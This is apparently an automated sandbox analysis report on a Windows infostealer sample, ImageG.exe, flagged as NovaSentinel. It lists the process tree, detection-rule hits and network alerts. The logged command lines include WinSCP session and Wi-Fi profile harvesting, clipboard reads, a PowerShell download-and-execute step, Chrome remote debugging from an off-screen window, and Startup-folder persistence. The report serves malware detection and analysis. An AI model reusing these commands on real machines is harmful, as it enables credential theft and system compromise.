        • reg.exe (PID: 9840 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 10120 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 10108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 8308 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8492 cmdline: C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • findstr.exe (PID: 2640 cmdline: findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • cmd.exe (PID: 9248 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 2452 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8380 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 8536 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8884 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 4452 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 2220 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 8048 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 3588 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 5236 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8224 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 1848 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 6240 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 6500 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 1144 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 9400 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 4376 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 9884 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 10036 cmdline: C:\Windows\system32\cmd.exe /d /s /c "mullvad account get" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 10056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 10028 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FO CSV /NH" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • tasklist.exe (PID: 9292 cmdline: tasklist /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1916 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 9644 cmdline: powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 9484 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 7288 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 9640 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 9568 cmdline: powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 9816 cmdline: C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • netsh.exe (PID: 5452 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 9916 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 10224 cmdline: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • taskkill.exe (PID: 9004 cmdline: taskkill /PID 9048 /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chrome.exe (PID: 9992 cmdline: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400 MD5: BB7C48CDDDE076E7EB44022520F40F77)
        • chrome.exe (PID: 10108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2232,i,12830479303068342978,11409588197743530798,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2248 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)
      • Conhost.exe (PID: 9916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_NovaSentinel | Yara detected NovaSentinel | Joe Security | 
Process Memory Space: cmd.exe PID: 4416 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | 
amsi64_5600.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | 

        System Summary

        Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", ProcessId: 4416, ProcessName: cmd.exe
        Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"", ProcessId: 9048, ProcessName: cmd.exe
        Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton, Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4416, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", ProcessId: 5600, ProcessName: powershell.exe
        Source: Process started, Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400, CommandLine: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400, ProcessId: 9992, ProcessName: chrome.exe
        Source: Process started, Author: frack113, Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, ProcessId: 7312, ProcessName: powershell.exe
        Source: Process started, Author: _pete_0, TheDFIRReport, Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "chcp", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 480, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 4988, ProcessName: chcp.com
        Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), Data: Command: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"", ProcessId: 9916, ProcessName: cmd.exe
        Source: Process started, Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro, Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4416, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", ProcessId: 5600, ProcessName: powershell.exe
        Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", ProcessId: 9484, ProcessName: cmd.exe
        Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", ProcessId: 4416, ProcessName: cmd.exe
        Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ProcessId: 5920, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ImageG.exe
        Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger, Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", ProcessId: 4416, ProcessName: cmd.exe
        Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4416, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", ProcessId: 5600, ProcessName: powershell.exe
        Source: Process started, Author: frack113, Data: Command: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid, CommandLine: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid, CommandLine|base64offset|contains: AA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4324, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid, ProcessId: 2608, ProcessName: reg.exe

        Stealing of Sensitive Information

        Source: Process started, Author: Joe Security, Data: Command: C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile", ProcessId: 9816, ProcessName: cmd.exe
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2025-03-15T20:26:43.087459+0100 | 2029846 | 1 | A Network Trojan was detected | 192.168.11.20 | 61018 | 94.139.32.29 | 443 | TCP
        2025-03-15T20:26:43.087459+0100 | 2035016 | 1 | A Network Trojan was detected | 192.168.11.20 | 61018 | 94.139.32.29 | 443 | TCP
        2025-03-15T20:26:43.087459+0100 | 2035015 | 1 | A Network Trojan was detected | 192.168.11.20 | 61018 | 94.139.32.29 | 443 | TCP


        Source: ImageG.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, Directory created: C:\Program Files\Windows NT\TableTextService\ImageG.exe
        Source: C:\Users\user\Desktop\ImageG.exe, File created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\LICENSE.electron.txt
        Source: C:\Users\user\Desktop\ImageG.exe, File created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\LICENSE.electron.txt
        Source: unknown, HTTPS traffic detected: 104.16.40.101:443 -> 192.168.11.20:49771 version: TLS 1.2
        Source: ImageG.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
